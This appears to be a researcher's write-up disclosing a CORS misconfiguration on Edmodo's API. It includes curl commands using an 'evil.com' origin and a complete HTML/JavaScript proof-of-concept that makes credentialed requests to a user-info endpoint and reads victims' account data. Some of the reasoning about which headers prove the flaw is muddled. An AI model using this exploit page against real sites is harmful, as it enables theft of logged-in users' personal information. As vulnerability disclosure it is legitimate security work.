Exploitation of CORS(Cross Origin Resource Sharing) on Edmodo
Hello All,
This is Yeasir Arafat here.While I was penetrating Edmodo I saw a api endpoint is vulnerable to CORS misconfiguration. At first we needed to ensure that, it’s vuln. to cors or not . For ensure the issue we must have set up curl on PC.
Here is curl command:
curl https://www.edmodo.com -H “Origin: https://evil.com"
Response:
200 ok.
But no Access-Control-Allowed-Credentials: true
That means Edmodo is vulnerable to CORS.
Now checking it’s on api.edmodo.com
curl https://api.edmodo.com -H “Origin: https://evil.com"
Response:
200 ok.
And here is: Access-Control-Allowed-Credentials: true
That means this sites are vulnerable to CORS.See the below image.
From that api endpoint I got sensitive information.Like ip,email,id,created date,about,etc etc.
Endpoint:
For Exploitation I used below code:
<!DOCTYPE html>
<html>
<head>
<title>CORS PoC Exploit</title>
</head>
<body>
<center><h1>CORS Exploit<br>Yeasir Arafat</h1>
<hr>
<div id=”demo”>
<button type=”button” onclick=”cors()”>Exploit</button>
</div>
<script type=”text/javascript”>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if(this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML = this.responseText;
}
};
xhttp.open(“GET”, “https://api.edmodo.com/users/id", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script></center>
</body>
</html>
I run this exploit code into my browser. And I can get user information from api.edmodo.com use my localhost or any other free domain or any place.For showing you guys I just run it into my browser.
And now if a logged in user use or hit the exploit button his account information will be exported to me.